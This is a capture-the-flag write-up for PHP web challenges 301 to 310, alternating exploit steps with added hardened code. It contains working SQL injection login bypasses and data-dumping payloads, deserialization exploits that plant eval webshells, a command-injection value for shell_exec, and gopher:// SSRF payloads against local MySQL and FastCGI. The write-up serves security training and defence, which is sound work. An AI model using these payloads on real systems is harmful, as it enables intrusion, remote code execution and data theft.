web301
Running it through Seay turned up nothing, so I went straight into reading the code.
In checklogin.php:
```php
$_POST['userid']  = !empty($_POST['userid'])  ? $_POST['userid']  : "";
$_POST['userpwd'] = !empty($_POST['userpwd']) ? $_POST['userpwd'] : "";
$username = $_POST['userid'];
$userpwd  = $_POST['userpwd'];
// $username is spliced straight into the query: no escaping, no prepared statement
$sql = "select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result = $mysqli->query($sql);
$row = $result->fetch_array(MYSQLI_BOTH);
```
The username is concatenated into the SQL statement without any filtering, which gives an SQL injection. The UNION makes the query return the constant 1 as sds_password, so userpwd=1 passes the comparison:
userid=1'union select 1#&userpwd=1
Login succeeds and we get the flag.
web302
Slightly different from the previous one. In fun.php:
```php
<?php
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>
```
The password is hashed, so we just hash the string we send the same way.
exp:
```php
<?php
$str = 1;
echo md5(md5($str.md5(base64_encode("sds")))."sds");
#d9c77c4e454869d5d8da3b4be79694d3
```
In checklogin.php:
```php
$_POST['userid']  = !empty($_POST['userid'])  ? $_POST['userid']  : "";
$_POST['userpwd'] = !empty($_POST['userpwd']) ? $_POST['userpwd'] : "";
$username = $_POST['userid'];
$userpwd  = $_POST['userpwd'];
$sql = "select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result = $mysqli->query($sql);
$row = $result->fetch_array(MYSQLI_BOTH);
```
Same as the previous challenge: the username is concatenated into the SQL statement without any filtering, which gives an SQL injection.
userid=1'union select d9c77c4e454869d5d8da3b4be79694d3#&userpwd=1
web303
This one limits the length of username, so SQL injection there no longer works.
But in dptadd.php:
```php
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
```
several parameters are controllable and none of them are filtered, so SQL injection is possible, but we have to be logged in first. In the database dump:
```sql
INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');
```
we find admin and its hashed password; blind guess: the password is admin.
After logging in with that weak password, visit dptadd.php. Every field value there is controllable, so we can put a subquery into any one of them: its result gets inserted into the table, and we read it back on dpt.php.
Dump the tables:
dpt_name=5',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
Columns:
dpt_name=5',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#
Flag:
dpt_name=5',sds_address=(select flag from sds_fl9g)#
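The same two queries written with bound parameters, as an added example that is not the challenge's code: it covers the login from web301/web302 and the INSERT from dptadd.php in web303. It assumes $mysqli is an open mysqli connection (mysqlnd available for get_result()); the function names and the $dpt keys are mine, the table and column names are the challenge's.

```php
<?php
// Added example, not the challenge source. Table and column names come from
// the challenge; $mysqli is assumed to be an open mysqli connection.

// web301/web302 login. The original splices $username into the query, so a
// UNION can make it return whatever "stored hash" the attacker supplies, and
// sds_decode() is an unsalted md5 chain anyone can recompute for a password
// of their choosing. Bound parameters keep the input as data, and
// password_verify() checks against a salted password_hash() value.
function login(mysqli $mysqli, string $username, string $password): bool
{
    $stmt = $mysqli->prepare(
        "SELECT sds_password FROM sds_user WHERE sds_username = ? LIMIT 1"
    );
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // null when no such user
    $stmt->close();
    // The input never changed the SQL that ran; a miss is simply a miss.
    return $row !== null && password_verify($password, $row['sds_password']);
}

// web303 dptadd.php. Every field is a placeholder, so a value such as
// "5',sds_address=(select flag from sds_fl9g)#" is stored verbatim as a
// department name instead of rewriting the INSERT.
function addDepartment(mysqli $mysqli, array $dpt): bool
{
    $stmt = $mysqli->prepare(
        "INSERT INTO sds_dpt (sds_name, sds_address, sds_build_date,
                              sds_have_safe_card, sds_safe_card_num, sds_telephone)
         VALUES (?, ?, ?, ?, ?, ?)"
    );
    $stmt->bind_param(
        "ssssss",
        $dpt['name'], $dpt['address'], $dpt['build_year'],
        $dpt['has_cert'], $dpt['cert_number'], $dpt['telephone']
    );
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

Passwords have to be stored with password_hash() at registration for password_verify() to work; with the existing md5 column the login is still injection-free, but the stored hash stays trivially recomputable.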
web304
Same steps as the previous challenge.
web305
In fun.php:
```php
<?php
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
    if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
        return false;
    }else{
        return true;
    }
}
?>
```
The filter is very tight, so SQL injection should be off the table.
In class.php:
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-17 13:20:37
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-17 13:33:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        // username is used as the file name, password as the file content
        file_put_contents($this->username, $this->password);
    }
}
```
file_put_contents() writes a string to a file. If we set username to 1.php and password to <?php @eval($_POST['a']); ?>, the one-line webshell is written into 1.php.
Next, find where deserialization happens.
In checklogin.php:
```php
// $user_cookie comes straight from the client's cookie
if(isset($user_cookie)){
    $user = unserialize($user_cookie);
}
```
exp:
```php
<?php
class user{
    public $username;
    public $password;
    public function __construct(){
        $this->username='1.php';
        $this->password='<?php eval($_POST[1]);phpinfo();?>';
    }
}
$a=new user();
echo urlencode(serialize($a));
```
Output:
O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D
Cookie: user=O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D
Visiting 1.php shows phpinfo(), so the upload succeeded.
Connect to the database with AntSword (蚁剑) and the flag can be found.
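How the cookie-to-object step in checklogin.php can be done so that the cookie cannot smuggle in an object whose __destruct() writes files, as an added example that is not the challenge's code; the same entry point is what web306 to web310 reuse through index.php. COOKIE_SECRET is a placeholder for a server-side secret, and mintUserCookie()/loadUserCookie() are my own names.

```php
<?php
// Added example, not the challenge's checklogin.php. COOKIE_SECRET is a
// placeholder. The user class keeps the challenge's two fields, but the
// __destruct() that wrote files is gone: a session object has no business
// touching the filesystem, and that removal is the real fix.
const COOKIE_SECRET = 'replace-with-a-long-random-server-secret';

class user
{
    public $username;
    public $password;
    public function __construct($u, $p) { $this->username = $u; $this->password = $p; }
}

// Server side: serialize, then sign. Only cookies minted here carry a valid MAC.
function mintUserCookie(user $u): string
{
    $data = base64_encode(serialize($u));
    return $data . '.' . hash_hmac('sha256', $data, COOKIE_SECRET);
}

// Cookie -> object. A forged or edited payload never reaches unserialize(),
// and even one that did could only become a plain user.
function loadUserCookie(string $cookie): ?user
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) return null;
    [$data, $mac] = $parts;
    // constant-time comparison of the MAC
    if (!hash_equals(hash_hmac('sha256', $data, COOKIE_SECRET), $mac)) return null;
    $raw = base64_decode($data, true);
    if ($raw === false) return null;
    // allowed_classes: a serialized dao/log/config object (the web306-310
    // gadgets) becomes __PHP_Incomplete_Class, so none of their __destruct() runs.
    $obj = unserialize($raw, ['allowed_classes' => ['user']]);
    return $obj instanceof user ? $obj : null;
}

// Constructed check: the O:4:"user" blob from this challenge, pasted in with
// no MAC, comes back as null; a cookie minted by the server comes back as a user.
$forged = 'O:4:"user":2:{s:8:"username";s:5:"1.php";s:8:"password";s:1:"1";}';
var_dump(loadUserCookie(base64_encode($forged)));
var_dump(loadUserCookie(mintUserCookie(new user('admin', 'x'))) instanceof user);
```

Better still, keep only a random session id in the cookie and the user record server-side; then there is nothing to unserialize at all.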
web306
In class.php, the close() method contains a file_put_contents() call we can use; next, find what can trigger close().
In dao.php, __destruct() calls close(), and unserialize() triggers __destruct() automatically.
In index.php there is an unserialize() call.
exp:
```php
<?php
class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}
class log{
    public $title='1.php';
    public $info='<?php eval($_POST[1]);?>';
}
echo base64_encode(serialize(new dao()));
```
web307
A Seay scan turns up shell_exec in dao.php.
shell_exec() runs a shell command:
```php
shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
```
which can be turned into
```sh
rm -rf ./;echo "<?php eval(\$_POST[1]);?>" >a.php; /*
```
After the `;` the shell runs the next command even if the one before it failed, so we set $this->config->cache_dir to the command we want.
Then, with these two classes, find the deserialization point again.
exp:
```php
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $cache_dir = ';echo "<?php eval(\$_POST[1]);?>" >a.php;';
}
echo base64_encode(serialize(new dao()));
```
Visit a.php and you have command execution.
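The same cache cleanup written so that cache_dir can never become a command, as an added example that is not the challenge's dao.php. CACHE_BASE and the function names are mine; the root cause (config coming out of unserialize()) is a separate fix at the deserialization point.

```php
<?php
// Added example, not the challenge's dao.php: clearing a cache directory
// without passing object state through a shell. CACHE_BASE is a placeholder.
const CACHE_BASE = '/var/www/html/cache';

function clearCache(string $cacheDir): bool
{
    // 1. Only a bare directory name: no '/', no ';', no quotes, no shell syntax.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $cacheDir)) return false;
    // 2. Resolve and confirm it still lies inside CACHE_BASE (no symlink escape).
    $base   = realpath(CACHE_BASE);
    $target = realpath(CACHE_BASE . '/' . $cacheDir);
    if ($base === false || $target === false || strpos($target, $base . '/') !== 0) {
        return false;
    }
    // 3. Delete with PHP file functions: no shell, no rm -rf, regular files only.
    foreach (glob($target . '/*') ?: [] as $f) {
        if (is_file($f)) unlink($f);
    }
    return true;
}

// If a shell is unavoidable, the name is validated the same way and then passed
// as one quoted literal, so a ';' inside it can never start a second command.
function clearCacheViaShell(string $cacheDir): bool
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $cacheDir)) return false;
    $dir = CACHE_BASE . '/' . $cacheDir;
    shell_exec('rm -f -- ' . escapeshellarg($dir) . '/*');
    return true;
}
```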
web308
There is an SSRF in fun.php.
Find where it is called, then find the deserialization point that reaches it.
Generate the payload with gopherus.py.
exp:
```php
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config = new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}
echo base64_encode(serialize(new dao()));
```
Send it and get the flag.
web309
Almost the same as the previous one, but this time the target is FastCGI; tweak the exp slightly.
exp:
```php
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config = new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
echo base64_encode(serialize(new dao()));
```
web310
Read the config file:
```php
<?php
class config{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo (base64_encode(serialize($a)));
?>
```
Access port 4476:
```php
<?php
class config{
    public $update_url = 'http://127.0.0.1:4476';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo (base64_encode(serialize($a)));
?>
```
Look around and the flag turns up.
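A scheme and destination check in front of the update fetch, as an added example that is not the challenge's fun.php. The payloads in web308 to web310 ride on the scheme (gopher:// to MySQL on 3306 and FastCGI on 9000, file:// for nginx.conf) and on the host (127.0.0.1, port 4476); isSafeUpdateUrl() and fetchUpdate() are my own names, and the host check here is IPv4 only.

```php
<?php
// Added example, not the challenge's fun.php. Validates an update URL before
// fetching it, then tells curl not to drift to another scheme on redirect.
function isSafeUpdateUrl(string $url): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) return false;
    // Scheme allowlist: gopher://, file://, dict://, php:// all stop here.
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return false;
    // Port allowlist: 3306, 9000 and 4476 stay unreachable even over http://.
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return false;
    // Resolve the host (IPv4 only here) and reject loopback, private,
    // link-local and reserved ranges, so 127.0.0.1 and the LAN are refused.
    $ips = filter_var($p['host'], FILTER_VALIDATE_IP)
        ? [$p['host']]
        : (gethostbynamel($p['host']) ?: []);
    if ($ips === []) return false;
    foreach ($ips as $ip) {
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) return false;
    }
    return true;
}

function fetchUpdate(string $url): ?string
{
    if (!isSafeUpdateUrl($url)) return null;
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_FOLLOWLOCATION  => false,   // a 302 to gopher:// or file:// is not followed
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT         => 5,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}
```

The resolve-then-fetch gap still leaves room for DNS rebinding; pin the checked address with CURLOPT_RESOLVE or route the fetch through an egress proxy that enforces the same rules.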